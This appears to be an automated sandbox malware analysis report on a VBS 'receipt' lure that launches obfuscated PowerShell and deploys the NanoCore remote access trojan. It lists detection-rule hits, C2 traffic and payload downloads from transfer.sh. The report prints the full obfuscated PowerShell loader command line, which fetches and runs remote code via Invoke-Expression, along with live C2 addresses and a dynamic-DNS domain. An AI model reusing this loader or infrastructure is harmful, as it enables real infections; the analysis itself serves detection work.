-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spli
Sigma detected: T1086 PowerShell ExecutionShow sources
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132761350295141751.6616.DefaultAppDomain.powershell

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 2548, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 2548, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: newjan.duckdns.orgVirustotal: Detection: 10%Perma Link
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49753 version: TLS 1.0
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.403297893.000002693259B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.379376693.00000269325E4000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49791 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49792 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49793 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49794 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49799 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49800 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49801 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49802 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49803 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49804 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49809 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49816 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49817 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49818 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49819 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49820 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49821 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49822 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49823 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49824 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49825 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49826 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49827 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49828 -> 194.147.140.20:6700
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: newjan.duckdns.org
Source: Joe Sandbox ViewASN Name: PTPEU PTPEU
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /PeIb5p/ffrtg.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yBhJOe/bbhyu.txt HTTP/1.1Host: transfer.sh
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49753 version: TLS 1.0
Source: global trafficTCP traffic: 192.168.2.5:49791 -> 194.147.140.20:6700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: aspnet_compiler.exe, 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: powershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.406940294.000002691A401000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.405467045.0000026919FC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.406940294.000002691A401000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.406014294.000002691A27A000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh
Source: powershell.exe, 00000003.00000002.405860296.000002691A1CC000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh/PeIb5p/ffrtg.txt
Source: powershell.exe, 00000003.00000002.408556411.000002691A679000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh/yBhJOe/bbhyu.txt
Source: unknownDNS traffic detected: queries for: transfer.sh
Source: global trafficHTTP traffic detected: GET /PeIb5p/ffrtg.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yBhJOe/bbhyu.txt HTTP/1.1Host: transfer.sh

E-Banking Fraud:

barindex

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 20.3.aspnet_compiler.exe.3df61b7.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.3.aspnet_compiler.exe.3ddc15e.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.3.aspnet_compiler.exe.3df0789.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.3.aspnet_compiler.exe.3df0789.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.3.aspnet_compiler.exe.3df61b7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.3.aspnet_compiler.exe.3df61b7.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.3.aspnet_compiler.exe.3ddc15e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.3.aspnet_compiler.exe.3ddc15e.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: aspnet_compiler.exe PID: 2548, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*Jump to behavior
Very long command line foundShow sources
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3046
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3046Jump to behavior
Source: 16 Items receipt.vbs, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: amsi64_6468.amsi.csv, type: OTHERMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 20.3.aspnet_compiler.exe.3df61b7.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.3.aspnet_compiler.exe.3df61b7.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.aspnet_compiler.exe.3ddc15e.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.3.aspnet_compiler.exe.3ddc15e.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.aspnet_compiler.exe.3df0789.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.3.aspnet_compiler.exe.3df0789.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.aspnet_compiler.exe.3df0789.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 20.3.aspnet_compiler.exe.3df61b7.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.3.aspnet_compiler.exe.3df61b7.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.aspnet_compiler.exe.3df61b7.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 20.3.aspnet_compiler.exe.3ddc15e.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.3.aspnet_compiler.exe.3ddc15e.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000003.432999714.0000020EAE009000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.431972357.0000020EAE005000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.435172148.0000020EAFE40000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
